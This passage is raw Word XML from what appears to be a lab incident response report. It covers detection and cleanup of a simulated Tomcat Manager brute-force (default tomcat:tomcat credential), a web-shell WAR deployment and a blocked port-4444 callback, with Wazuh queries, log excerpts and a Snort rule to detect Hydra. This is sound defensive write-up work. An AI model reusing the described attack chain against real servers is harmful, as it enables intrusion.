        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh generated INC-JLR-LAB-2026-0312 at 02:41:07 UTC from correlation of rules 100441–100445 — Level 12 Critical alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh active response automatically applied iptables rule on Tomcat agent (192.168.100.10), blocking further inbound connections from 192.168.100.50 at the host level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Email alert sent to lab analyst at 02:41:09 UTC (2 seconds from alert generation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst reviewed Wazuh dashboard at 02:43:22 UTC — identified 3 critical alert types: multi-source scan, WAR deployment, OT probe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial scope: 1 attacker IP (192.168.100.50 — Kali), 1 compromised target (192.168.100.10 — Tomcat), 1 OT-equiv boundary probe (192.168.100.80).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STEP 2 — Scope Assessment  |  02:50–03:15 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst queried Wazuh dashboard: all alert events from 192.168.100.50 and 192.168.100.10 in prior 60 minutes — 847 total events returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">OT boundary probe confirmation: pfSense deny log confirmed 3 SYN packets to OT-equiv alias 192.168.100.80–82 port 102 — all DENIED. OT-equivalent segment confirmed unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata confirmed TCP/4444 outbound from Tomcat VM dropped — 3 SYN attempts, Kill States activated, no C2 session established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat access.log reviewed: 312 HTTP 401 events followed by HTTP 200 at 02:13:24 — brute-force success confirmed; shell.war deployed at 02:17:33.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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Wazuh Query — All events from attacker and target IPs in last 60 minutes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Executed from Wazuh Dashboard &gt; Discover &gt; Filter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">data.srcip: 192.168.100.50 OR data.srcip: 192.168.100.10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">AND @timestamp: [now-60m TO now]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4F1C0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Results (excerpt) — 847 events returned:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:03:14Z  Snort        192.168.100.50 -&gt; 192.168.100.10   Port scan (SID 9000001)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:11:52Z  Tomcat agent 192.168.100.50 -&gt; /manager/html    HTTP 401 (brute-force)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:13:24Z  Tomcat agent 192.168.100.50 -&gt; /manager/html    HTTP 200 (SUCCESS)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:17:33Z  Tomcat agent 192.168.100.50 -&gt; /manager/text/deploy  HTTP 200 (WAR deployed)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:28:47Z  Suricata     192.168.100.10:49221 -&gt; 192.168.100.50:4444  DROP (C2 block)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:40:51Z  pfSense deny 192.168.100.10 -&gt; 192.168.100.80:102  DENY (OT probe)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">02:41:07Z  Wazuh        Rule 100441 FIRED — L12 Critical  INC-JLR-LAB-2026-0312</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6.3 Phase 3 — Containment, Eradication, and Recovery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STEP 3 — Short-Term Containment  |  02:58–03:30 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Network isolation of Tomcat VM: Analyst added 192.168.100.10 to pfSense permanent block alias (Firewall &gt; Aliases &gt; BLOCK_HOSTS) — all traffic to/from Tomcat VM blocked at pfSense level except management syslog to Wazuh. Timestamp: 02:58:14 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali VM block: 192.168.100.50 added to pfSense block alias independently — prevents any further inbound from attacker IP. Timestamp: 03:01:47 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata block table confirmed: 192.168.100.50 already in pfSense pf block table from Suricata SID 9100001 (auto-added at 02:03:14). Block duration extended to permanent via alias. Timestamp: 03:04:22 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">WAR file deactivation: Via Tomcat Manager (accessible from pfSense management path), shell.war undeploy command executed — /shell context removed. Timestamp: 03:09:55 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat Manager credentials: Tomcat admin account (tomcat:tomcat) disabled via tomcat-users.xml edit + Tomcat service restart. Timestamp: 03:12:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">OT-equiv alias audit: pfSense deny log confirmed zero traffic transited the OT-equiv boundary at any point — DENY-TOMCAT-TO-OT-EQUIV rule held on all 3 probe attempts.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STEP 4 — Long-Term Eradication  |  03:30–06:00 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic collection: Wazuh dashboard alert history exported (PDF + JSON) for all events related to INC-JLR-LAB-2026-0312. pfSense firewall deny log exported. Snort and Suricata alert files archived from /var/log/snort/ and /var/log/suricata/. Timestamp: 03:30 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware artefact removal: shell.war removed from Tomcat webapps directory (/opt/tomcat/webapps/shell/). Tomcat work directory purged. cmd.jsp confirmed absent from all webapps directories. Timestamp: 03:45 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat hardening: Manager interface restricted to localhost only (context.xml Valve update — RemoteAddrValve allow 127\.\d+\.\d+\.\d+); weak credential removed; strong random password generated for admin account. Timestamp: 04:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IOC sweep: Analyst checked all lab VMs (pfSense, Wazuh) for signs of secondary compromise — Wazuh agent status confirmed healthy on both; no unauthorized processes or network connections found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata and Snort rule update: ET Open rulesets manually triggered for update pull via pfSense package manager — ensures any new signatures for the C2 IP range are loaded. Timestamp: 05:00 UTC.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STEP 5 — Recovery  |  06:00–06:58 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat VM snapshot restore: After forensic collection, Tomcat VM restored from clean pre-exercise snapshot (baseline state v14.2) — ensures no persistence artifacts remain. Timestamp: 06:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-restore hardening: Wazuh agent re-registered on restored Tomcat VM; Tomcat Manager restricted to localhost; strong credentials confirmed; pfSense block alias updated to remove Tomcat IP now that it is clean. Timestamp: 06:30 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">pfSense block alias cleanup: Kali VM IP (192.168.100.50) retained in permanent block alias for duration of post-incident observation period (24 hours). Timestamp: 06:45 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata block table flushed of time-expired entries; lab confirmed operational — Tomcat accessible on TCP/8080 from authorized sources only. Wazuh alert stream confirmed clean. Timestamp: 06:50 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Full containment declared by lab analyst at 06:58:22 UTC. Wazuh incident INC-JLR-LAB-2026-0312 status updated to Resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Phase 4 — Post-Incident Activity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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 6 — Post-Incident Review and Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltration determination: Suricata confirmed all TCP/4444 outbound SYN packets from Tomcat VM were dropped — no C2 session established. No data left the lab network. Status: No confirmed exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-incident report: Full PIR completed within 5 days per lab CIRP equivalent. Root cause: Weak Tomcat Manager credential (tomcat:tomcat default) allowed brute-force success within 90 seconds. Remediation: Tomcat Manager restricted to localhost; strong credentials enforced; Wazuh rule 100442 threshold reduced to 10 attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Control improvement — Tomcat hardening: RemoteAddrValve deployed to restrict Manager access to localhost. All lab exercises post-incident require non-default Tomcat credentials. Hashed passwords enforced in tomcat-users.xml.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Control improvement — Snort/Suricata: New custom rule SID 9000005 added — detect Hydra user-agent string in HTTP headers. Wazuh decoder updated to parse Tomcat 401 floods from access.log with count threshold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Control improvement — OT boundary: pfSense rule DENY-TOMCAT-TO-OT-EQUIV verified active post-restore; Wazuh rule 100444 threshold reduced to first SYN packet (was 3) for faster OT probe detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:before="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab exercise documentation: Full incident timeline, log evidence, and controls assessment filed as lab deliverable for Trinity Project. All exported Wazuh alert JSON archived.</w:t>
      </w:r>
    </w:p>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7. Incident Metrics and Controls Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Response Time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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Target (Lab CIRP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Actual (INC-0312)</w:t>
            </w:r>
          </w:p>
